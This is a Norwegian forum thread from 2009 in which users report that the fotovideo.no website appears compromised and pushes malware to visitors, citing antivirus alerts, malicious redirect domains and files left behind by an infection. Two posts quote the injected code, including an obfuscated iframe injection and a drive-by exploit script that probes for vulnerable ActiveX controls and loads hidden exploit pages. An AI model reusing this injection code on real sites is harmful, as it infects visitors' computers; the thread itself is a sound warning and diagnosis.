KalleKanin Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Prøver å gå inn på fotovideo.no, og da prøver IE å installere et eller annet program. Trykket øyeblikkelig på Cancel, men ser at man prøver å redirecte til luckffxi.com. Det ser ut til at dette er forsøkt på å ta over PC'en: Norton Safe Web har analysert luckffxi.com for trygghets- og sikkerhetsproblemer. Nedenfor finner du et utvalg av truslene som ble funnet. "Trojan.Malscript!html is a generic detection for HTML files infected with a java script that redirects the browser to a malicious Web site that may exploit the browser or download other malicious threats." Se også her: Melding om Malware i Safari Lenke til kommentar
sn0dig Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Ser jammen ut som at de har blitt hacket ja. Lenke til kommentar
KalleKanin Skrevet 21. februar 2009 Forfatter Del Skrevet 21. februar 2009 (endret) Ser jammen ut som at de har blitt hacket ja. Prøvde på nytt nå, og fikk ikke det samme med en gang, men ser i statusvinduet at man prøver å laste en gif fra me9x.cn. Dette er også en suspekt side... Safe Browsing - Diagnostic page for me9x.cn og tydeligvis noe MPX.no ble utsatt for også: MPX.NO gir deg trojanere? og Trojaner på MPX sine sider? Endret 21. februar 2009 av KalleKanin Lenke til kommentar
TheGizmo Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Virker fint i Firefox, men i IE ble siden stoppet av AVG, og siden forsøkte å laste denne koden: <script src=http://%6D%65%39%78%2E%63%6E/ken.gif></script><IFRaME src="http://www.luckffxi.com/index2.htm" width=100 height=0></IFRAME> <img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=32&id=2582104&tpages=1&ttimes=1&tzone=1&tcolor=32&sSize=1280,800&referrer=&vpage=http%3A//www.fotovideo.no/aspx/loginVnet.aspx%3FReturnUrl%3D%252fDefault.aspx" /> Lenke til kommentar
k-orm Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Siden kommer opp normalt hvis man bruker Opera. Da med infokapsler deaktivert, men javascript og automatisk omdirigering aktivert. Lenke til kommentar
Beej80 Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Jupp ... Kan absolutt se slik ut. Kaspersky kicket inn med en gang jeg lastet siden og varslet om en trojan. Er det noen som har sendt de en mail og informert om det? Mvh, Beej80 Lenke til kommentar
Acurus Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Fikk og noe meldinger fra F-secure når jeg gikk inn der med Opera. Så er nok noe rart pågang ja.. Lenke til kommentar
Ratleto Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 (endret) Avast rapporterer også virus med bruk av IE7. Helt klart at de har et problem. Har noen sagt ifra til dem, eller? Edit: Sendte dem en epost jeg... Endret 21. februar 2009 av Ratleto Lenke til kommentar
andreash Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Fungerer helt fint på Mac og Firefox Andreas Lenke til kommentar
hertugen Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Fikk ingen melding, kjører på IE7 og Eset NOD32. Lenke til kommentar
dsgf Skrevet 21. februar 2009 Del Skrevet 21. februar 2009 Sida laster her, i IE7, men ingen linker funker og source viser bare en rubbish script-url. Lenke til kommentar
k-orm Skrevet 22. februar 2009 Del Skrevet 22. februar 2009 Alt så tilsynelatende greit ut, men ble infisert av noen filer, muligens rootkit. Oppdaget plutselig at disse filene kjørte: soxpeca.exe mabidwe.exe afisicx.exe tpszxyd.sys atlsystem157336.exe comsa32.sys nxtepad.exe msrstart.exe tpszxyd.sys har forbindelse med Gen-FraudLoad Det er ikke mulig å fjerne alle filene og registeroppføringene med Malwarebytes og SuperAntiSpyware. Lenke til kommentar
vargaz Skrevet 22. februar 2009 Del Skrevet 22. februar 2009 Ser jeg fikk noe greier jeg også, men ser ut som avg tok det... får håpe det.. Lenke til kommentar
TOH65 Skrevet 22. februar 2009 Del Skrevet 22. februar 2009 Jeg prøvde å gå inn på sidene til Fotovideo tidligere i kveld og fikk Varsel om en troyaner fra Norman antivirus. Jeg hadde e-postadresse til dem lagret og fikk sendt en mail, men det er jo helg og det er sikkert lurt å styre unna til over helgen til de har fått rensket opp. Lenke til kommentar
norbat Skrevet 22. februar 2009 Del Skrevet 22. februar 2009 Ser det er samme type 'iframe'-script som benyttes til denne infeksjonen som det var på mpx.no Klikk for å se/fjerne innholdet nedenfor <script> document.write("<iframe width=100 height=0 src=flash.htm></iframe>"); try{var a; var ado=(document.createElement("object")); if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1) ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var as=ado.createobject("Adodb.Stream","")} catch(a){}; finally{ if(a!="[object Error]"){ document.write("<iframe width=50 height=0 src=14.htm></iframe>")} else{ try{var n; var hm=new ActiveXObject("snpvw.Snaps"+"hot Viewer Con"+"trol.1");} catch(n){}; finally{if(n!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}} if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0) document.write("<iframe src=02.htm width=100 height=0></iframe>"); function test() { Galeee = "IER" + "PCtl.I" + "ERP" + "Ctl.1"; try { Like = new ActiveXObject(Galeee); }catch(error){return;} vvvvv = Like.PlayerProperty("PRODUCTVE"+"RSION"); if(vvvvv<="6.0.14.552") document.write("<iframe width=100 height=0 src=real.htm></iframe>"); else document.write("<iframe width=100 height=0 src=real.html></iframe>"); }}} test(); </script> <script language="javascript" src="http://count35.51yes.com/click.aspx?id=350455430&logo=1"></script> Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå